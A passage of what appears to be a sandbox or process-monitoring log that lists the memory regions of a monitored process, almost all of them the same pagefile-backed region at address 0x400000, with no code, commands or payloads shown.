"pagefile_0x0000000000400000" filename = "" Region: id = 9480 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9481 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9482 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9483 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9484 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9485 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9486 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9487 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9488 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9489 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9490 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9491 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9492 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9494 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9495 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9496 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9497 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9498 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9499 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9500 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9501 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9502 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9503 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9504 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9505 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9506 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9507 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9508 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9509 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9510 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9511 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9512 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9513 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9514 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9515 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9516 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9517 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9518 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9519 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9520 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9521 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9522 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9523 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9524 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9525 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9526 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9527 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9528 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9529 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9530 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9531 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9532 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9533 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9534 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9535 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9536 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9537 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9538 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9539 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9540 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9541 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9542 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9543 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9544 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 9545 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9546 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9547 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9548 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9549 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9550 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9551 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9552 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9553 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9554 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9555 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9556 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9557 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9558 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9559 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9560 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9561 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9562 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9563 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9564 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9565 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9566 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9567 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9568 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9569 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9570 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9571 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9572 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9573 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9574 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9575 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9576 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9577 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9578 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9579 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9580 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9581 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9582 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9583 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9584 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 9585 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9586 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9587 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9588 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9589 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9590 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9591 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9592 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9593 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9594 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9595 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9596 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9597 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9599 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9600 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9601 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9603 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9604 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9605 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9607 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9608 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9609 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9610 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9611 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9612 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9613 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9614 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9615 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9616 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9617 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9618 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9619 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9620 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9621 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9622 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9623 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9624 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9625 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9626 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9627 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9628 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9629 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9630 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9631 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9632 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9633 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9634 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9635 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9636 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9637 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9638 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9639 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9640 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9641 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9642 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9643 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9644 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9645 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9646 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9647 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9648 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9649 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9650 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9651 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9652 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9653 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9654 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9655 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9656 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9657 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9658 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9659 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9660 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9661 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9662 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9663 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9664 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9665 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9666 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9667 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9668 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9669 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 